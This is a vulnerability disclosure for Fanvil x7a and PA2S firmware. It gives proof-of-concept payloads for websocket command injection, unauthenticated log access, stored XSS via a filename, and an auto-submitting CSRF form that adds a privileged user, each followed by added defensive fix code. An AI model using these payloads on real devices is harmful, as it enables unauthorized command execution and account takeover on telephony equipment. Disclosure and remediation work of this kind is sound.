Fanvil x7a & PA2S Vulnerability Disclosure

Jul 19, 2024

Websocket Command Injection (CVE-2025-*****)

Proof of Concept:

Websocket Init Request:

GET /Ping HTTP/1.1
Host: FANVIL-HOST
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive, Upgrade
Cookie: auth=1a64000a000273ff; CUR_LANG=en; CUR_LANGCLICK=true; keepOnLine=true
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Websocket Init Response:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade

Command Injection Websocket Communication:

1.1.1.1; touch /sdcard/pwn
Ping 1.1.1.1; touch /sdcard/pwn failed

Terminal Log:

:/Alarms
Android
DCIM
Debug
Download
Movies
Music
Notifications
Pictures
Podcasts
Records
Ringtones
Secure
pwn


Mitre Reference:

Vulnerability Type: Command Injection
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal Ping Tool
Description: The management portal’s diagnostic ping tool in Fanvil x7a firmware version 2.6.0.1182 and PA2S firmware version 2.12.44.9 does not validate or sanitize the user-supplied ping target. Because of this, any unauthenticated attacker can inject additional shell commands (as the `;`-separated payload in the proof of concept shows) and run code in the underlying Android operating system.
Attack Vectors: A remote unauthenticated attacker can run arbitrary shell commands by sending a specially crafted websocket request to the diagnostic ping tool.
Attack Type: Remote
Impact Code execution: true
Impact Escalation of Privileges: true
Impact Information Disclosure: true
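The fix a vendor would apply to the ping tool, as an added example that is not Fanvil's code: the websocket handler is assumed to pass the raw target string to validate_ping_target() before anything is executed, and ping is invoked with an argument vector so no shell ever parses the target.

```python
"""Hardened handling of the diagnostic ping target.

Added example, not Fanvil's code. Assumes the websocket handler hands the
raw target string to validate_ping_target() before anything is executed.
"""
import ipaddress
import re
import subprocess
from typing import List, Optional

# RFC 1123 hostname: labels of letters, digits and hyphens, dot-separated.
# Whitespace, ';', '|', '$', backticks and other shell metacharacters cannot match.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_ping_target(raw: str) -> Optional[str]:
    """Return a normalised target if it is an IP literal or a plain hostname, else None."""
    target = raw.strip()
    try:
        return str(ipaddress.ip_address(target))  # IPv4 or IPv6 literal
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    return None


def build_ping_argv(raw: str, count: int = 4) -> Optional[List[str]]:
    """Argument vector for ping, or None if the target is rejected.

    The target travels as a single argv element, so no shell interprets it;
    the validators also rule out a leading '-', so it cannot be read as an option.
    """
    target = validate_ping_target(raw)
    if target is None:
        return None
    return ["ping", "-c", str(count), target]


def run_ping(raw: str, timeout: float = 10.0) -> str:
    """Execute the validated ping without a shell and return its output text."""
    argv = build_ping_argv(raw)
    if argv is None:
        return "Ping failed: invalid target"
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout or proc.stderr
```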



Websocket Broken Access Control (CVE-2025-*****)

Proof of Concept

Websocket Init Request:

GET /log HTTP/1.1
Host: FANVIL-X7Z
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive, Upgrade
Cookie: auth=1a64000a000273ff; CUR_LANG=en; CUR_LANGCLICK=true; keepOnLine=true
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Websocket Init Response:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade

Unauthenticated Log Query Websocket Communication:

via = [SIP/2.0/UDP FANVIL-HOST:5060]
Use dialog local ctt[<sip:9201@FANVIL-HOST:5060>]
pfmGetMwiByLine: Mwi: line=13, oldMsg=0, newMsg=0
pfmGetMwiByLine: Mwi: line=14, oldMsg=0, newMsg=0
Transaction use p2p [FANVIL-HOST:5060]
send REGISTER message!
Response in authorization |9fed49ad90fc0560426ac4e8a583dab0|
transaction id=[3102]!


Mitre Reference:

Vulnerability Type: Incorrect Access Control
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal’s Websocket Authentication Handler
Description: The websocket handler of Fanvil x7a firmware version 2.6.0.1182 and PA2S firmware version 2.12.44.9 does not enforce authentication against users without a session. As a result, anyone can view device resources such as operational logs and perform diagnostic requests without credentials.
Attack Vectors: A remote unauthenticated attacker can access device resources through websocket connections without any user credentials.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true
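A deny-by-default gate for the websocket handshake, as an added example that is not Fanvil's code: it assumes a server-side session table keyed by the auth cookie that the browser already sends on the upgrade request, and that every websocket path (/Ping, /log and any other) passes through it before 101 Switching Protocols is returned. The Origin comparison is an extra check, not something the advisory describes.

```python
"""Deny-by-default authorization for websocket upgrades.

Added example, not Fanvil's code. Assumes the portal keeps a server-side
session table keyed by the 'auth' cookie value the browser already sends
on the upgrade request, and that this gate runs for every websocket path
(/Ping, /log and any other) before '101 Switching Protocols' is returned.
"""
from http.cookies import SimpleCookie
from typing import Dict, Mapping, Tuple
from urllib.parse import urlsplit

# Constructed session table for the example: cookie value -> role.
SESSIONS: Dict[str, str] = {"0123456789abcdef": "admin"}


def websocket_upgrade_decision(path: str, headers: Mapping[str, str],
                               sessions: Mapping[str, str]) -> Tuple[int, str]:
    """Return the HTTP status to answer the upgrade with and a short reason."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("upgrade", "").lower() != "websocket":
        return 400, "not a websocket upgrade"

    # Browsers send Origin on websocket handshakes. Anything other than the
    # device's own host is a cross-site page trying to ride the user's cookies.
    origin = h.get("origin")
    if origin is not None:
        if urlsplit(origin).netloc.lower() != h.get("host", "").lower():
            return 403, "origin mismatch"

    # Every websocket path needs a valid session; there is no anonymous path.
    jar = SimpleCookie(h.get("cookie", ""))
    token = jar["auth"].value if "auth" in jar else None
    if token is None or token not in sessions:
        return 401, "login required for %s" % path

    return 101, "Switching Protocols"
```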



Cross-Site Scripting (CVE-2025-*****)

Proof of Concept

Document Object Model:

<div class="content">
  <div class="navbar">
    <div class="label_f">
      <span id="XSTR_WEB_DEVICELOG" class="block">Device Log</span>
      <img src="help.png" id="fv.note.deviceLog" class="help-img" alt="help">
      <div style="display:inline-block; float:right" class="block">
        <input type="button" value="Save" id="save" lang="XSTR_OPT_SAVE" style=" float:right; width:100px; margin-bottom:10px;" class="lit_btninput width8rem">
        <input type="button" value="Clear" id="clear" lang="XSTR_OPT_CLEAR" style="float:right; width:100px; margin-right:20px;" class="lit_btninput width8rem">
        <input type="button" value="stop" id="stop" lang="XSTR_WEB_STOP" style="float:right; width:100px; margin-right:20px;" class="lit_btninput width8rem">
        <input type="button" value="Start" id="start" lang="XSTR_LBL_START" style="float:right; width:100px; margin-right:20px;" class="lit_btninput width8rem" disabled="">
      </div>
    </div>
    <div class="socket_body height30rem f16" id="soc">
      operating information.<br>client[0] ip=[10.0.100.26] nonce=[1a64000a000273ff]<br>client[1] ip=[10.0.100.26] nonce=[1a64000a00028775]<br>client[2] ip=[] nonce=[]<br>client[0] ip=[10.0.100.26] nonce=[1a64000a000273ff]<br>client[1] ip=[10.0.100.26] nonce=[1a64000a00028779]<br>client[2] ip=[] nonce=[]<br>sipHsDbBackupCheck!<br>onTimeSntpServerGet: remote failed.<br>No module care event VCORE_TMSET_EVENT.<br><br>file [/sdcard/Ringtones/<img src=1 onerror=alert(1)>.wav] size is 0
    </div>


Mitre Reference:

Vulnerability Type: Cross-Site Scripting
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal’s Device Log
Description: The device log component of Fanvil x7a firmware version 2.6.0.1182 and PA2S firmware version 2.12.44.9 does not sanitize or encode reflected user-supplied data before rendering it. This allows HTML to be injected into the log, which can be used to execute malicious JavaScript in the browser of any user who views the device log component.
Attack Vectors: A remote unauthenticated attacker can send a specially crafted request that injects JavaScript code into the management portal’s log tool.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true
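Output encoding for the log view, as an added example that is not Fanvil's code: the DOM above shows log lines joined with `<br>` and placed into the `#soc` div as HTML, so each line is escaped first and the ringtone filename from the proof of concept is displayed literally instead of being parsed as markup.

```python
"""Output encoding for the device log view.

Added example, not Fanvil's code. Assumes the server builds the HTML
fragment that lands in the #soc div by joining log lines with <br>.
"""
import html
from typing import Iterable


def render_log_html(lines: Iterable[str]) -> str:
    """Escape every log line, then join with <br> exactly as the portal does."""
    return "<br>".join(html.escape(line, quote=True) for line in lines)


def contains_markup(rendered: str) -> bool:
    """True if any raw '<' or '>' survived encoding (apart from our own <br>)."""
    stripped = rendered.replace("<br>", "")
    return "<" in stripped or ">" in stripped


# Constructed sample modelled on the log excerpt in the proof of concept.
SAMPLE_LINES = [
    "sipHsDbBackupCheck!",
    "onTimeSntpServerGet: remote failed.",
    "file [/sdcard/Ringtones/<img src=1 onerror=alert(1)>.wav] size is 0",
]
```

On the client side the equivalent is to append each line with textContent plus a br element rather than assigning the joined string to innerHTML.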



Cross-Site Request Forgery (CVE-2025-*****):

Proof of Concept

Cross-Site Request Forgery Payload:

<html>
  <body>
    <form action="http://FANVIL-HOST/profile.htm" method="POST">
      <input type="hidden" name="ACN&#95;UserName" value="test" />
      <input type="hidden" name="ACN&#95;UserPasswd" value="&#36;EP&#94;&#37;39&#93;UGFzc3dvcmQxIQ&#61;&#61;" />
      <input type="hidden" name="ACN&#95;UserPasswdConfirm" value="&#36;EP&#94;&#37;39&#93;UGFzc3dvcmQxIQ&#61;&#61;" />
      <input type="hidden" name="ACN&#95;UserLevel" value="10" />
      <input type="hidden" name="ReturnPage" value="&#47;profile&#46;htm" />
      <input type="hidden" name="DefaultAdd" value="Add&#32;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


Mitre Reference:

Vulnerability Type: Cross-Site Request Forgery
Vendor of Product: Fanvil
Affected Product Code Base: Fanvil x7a Android Phone 2.6.0.1182
Fanvil PA2S SIP Gateway 2.12.44.9
Affected Component: Management Portal’s Device Log
Description: The request handler of Fanvil x7a firmware version 2.6.0.1182 and PA2S firmware version 2.12.44.9 does not enforce any cross-origin protection for state-changing requests performed against the application. Because of this, the cross-origin boundary can be bypassed completely, allowing Cross-Site Request Forgery attacks against any endpoint.
Attack Vectors: A remote unauthenticated attacker who has coerced an administrator into viewing an attacker-owned site, usually through ordinary web browsing or a shared link, can perform any request against the application using the administrator’s authenticated session.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true
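The two server-side controls that defeat the form above, as an added example that is not Fanvil's code: it assumes the POST handlers (profile.htm in the proof of concept) can read the request headers and the session's CSRF token before acting. The Origin/Referer comparison refuses the cross-site submission; the per-session token is the second, independent layer.

```python
"""Cross-origin checks for state-changing requests.

Added example, not Fanvil's code. Assumes the POST handlers (profile.htm in
the PoC) can read request headers and the session's CSRF token before acting.
"""
import hmac
from typing import Mapping, Optional
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def _source_host(headers: Mapping[str, str]) -> Optional[str]:
    """Host named by Origin (preferred) or Referer; None if neither is usable."""
    h = {k.lower(): v for k, v in headers.items()}
    origin = h.get("origin")
    if origin and origin.lower() != "null":
        return urlsplit(origin).netloc.lower()
    referer = h.get("referer")
    if referer:
        return urlsplit(referer).netloc.lower()
    return None


def origin_check(method: str, headers: Mapping[str, str], device_host: str) -> bool:
    """Safe methods pass; anything else must originate from the device itself."""
    if method.upper() in SAFE_METHODS:
        return True
    src = _source_host(headers)
    # A browser-submitted form always carries Origin or Referer, so a POST
    # with neither is refused rather than trusted.
    if src is None:
        return False
    return src == device_host.lower()


def token_check(form_token: Optional[str], session_token: str) -> bool:
    """Per-session token embedded in each form; a cross-site page cannot read it."""
    if not form_token:
        return False
    return hmac.compare_digest(form_token, session_token)


def csrf_check(method, headers, device_host, form_token, session_token) -> bool:
    """Both controls must pass for a state-changing request."""
    if method.upper() in SAFE_METHODS:
        return True
    return origin_check(method, headers, device_host) and token_check(form_token, session_token)
```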


Timeline:

19/07/24 - initial contact disclosure